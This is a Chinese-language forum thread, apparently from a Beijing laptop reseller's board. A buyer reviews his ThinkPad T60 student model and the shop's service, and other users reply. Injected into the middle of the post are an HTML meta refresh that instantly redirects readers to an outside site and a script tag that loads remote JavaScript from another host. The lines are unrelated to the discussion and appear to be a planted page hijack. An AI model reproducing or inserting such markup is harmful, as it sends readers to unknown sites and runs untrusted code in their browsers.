开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 迟到的购机心得

本来刚买新机的时候就想来发发帖的,可是新机子没怎么用也不好说什么。用过一个阶段觉得是时候来冒个泡了::84:: 。
     我买的是t60学生机,性价比真是很不错。虽说学生机没有指纹,不过没指纹也有没指纹的好处。以前在学校的时候,我屋一个人买的t43(是我们屋一起陪他在翔意买的),一次结课要交电子版论文,他没拿让我们帮他带过去,可是谁也打不开他电脑,只好跑了九楼回来拿,哈哈。太安全的东西也会带来一些麻烦的。
       ::85:: 我的t60用过一段时间之后,觉得还是很不错的。虽然在一些地方不如t43::65:: (侧面的硬盘盖比较松软,手触板结合也不是很紧),但是也有很多比较好的改进(usb口的排放合理多了,散热要比同频的t43好些)。这些就要期待联想把ThinkPad不断改进了。

然后来说说在翔意买东西的一点心得吧。在翔意买东西我是比较放心的,以前陪同学来过两次,他们之后都说不错。我就打算毕业时候换电脑也在这里买,所以经常来论坛泡泡,当然也 为了购机优惠::78::。取货的那天看货的人比较多,也比较仓促,拿了机子交完钱就开心的回家了。过了几天才想起来忘了提优惠的事了,想着钱都付了也没法改了,就在论坛发了发牢骚。没想到居然有人理会,还通知我可以再去把优惠的钱退给我。::81:: 意外所得很是开心。这就是翔意的信誉,呵呵。不过买机也遇到了些问题,我的机子是没有一键恢复,原带xp专业英文系统,购机那天还没看清英文系统是个什么样,就被那个传说中的翔意MM给不小心弄崩了。不过装了翔意的中文用着也很好使也一直没想着换回去,就是可惜了我的coa了::79:: 。这个事还要请杨扬帮帮忙,什么时候弄个ibm英文恢复盘,那就完美了::75:: 。
        现在在公司同事基本用的都是ibm,当然水的居多,我把翔意介绍给他们,他们都后悔怎么早不知道。这可不是夸张,我的一个同事的t43就被人骗了,cpu是刷出来的,之后都找不到经销商了。现在他们想买配件都会托我帮他们买,因为翔意很有信誉的,当然也有我推荐::77::的功劳。这里也给翔意点建议,最近去翔意看到很多新面孔,因该是新去的吧,希望他们能像老板一样,提供准确的专业的服务。

本来想给大家看看我的本本,可是没找到放附件的地方。。。。。。。具汗。。。。。。。。以后再补上吧。

终于有空来上网了,在山西出差,也没有好点的相机,手机先照两个吧,等回北京再用我的佳能A710照几个大的。
       +500---tszmsid

<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

工作时候照的

工作时候照的

太原移动的一个机房

太原移动的一个机房

bsc设备

bsc设备

评分

tszmsid + 500 加500吧 尽快把照片补上啊 要不加不了 ...

lz好像特别感动的样子,哈哈哈哈哈哈哈哈
点发表文章然后出来的界面可以再输入验证码和附件。
  聼起來很不錯哦!
   没找到附件的地方? 输入验证码的时候. 下面不就是上传附件吗, 呵呵  或者现在你再编辑帖子就能看见上传附件的地方了   写的不错. 鼓励一下.   然后把图片补上
英文专业版隐藏分区恢复盘可以随时来公司取,我们又提供,一套只要200翔币哦,呵呵
英文专业版隐藏分区恢复盘可以随时来公司取,我们又提供,一套只要200翔币哦,呵呵
在发点图片吧~!
学生机很划算
谢谢楼主!支持XY
谢谢楼主!支持XY
不错,顶顶

真情流露。。。。

我也好感动啊。。。。
支持T60
准备出手
支持一下,
不过还是喜欢指纹
上图上图
英文系统被我弄崩啦??啥时候的事!!!78::
恭喜
原帖由 愚木丫头 于 2006-11-28 20:46 发表

被传说中的MM弄崩溃,应该觉着高兴才是
原帖由 wangwei 于 2006-11-28 21:06 发表
被传说中的MM弄崩溃,应该觉着高兴才是

原帖由 愚木丫头 于 2006-11-28 20:46 发表

哈哈,有人对LZ不满意了~^_^
没有不满,没有不满!记得我不应该犯这样的错误呀!
不错不错  我也买的学生机
  我也要買。。。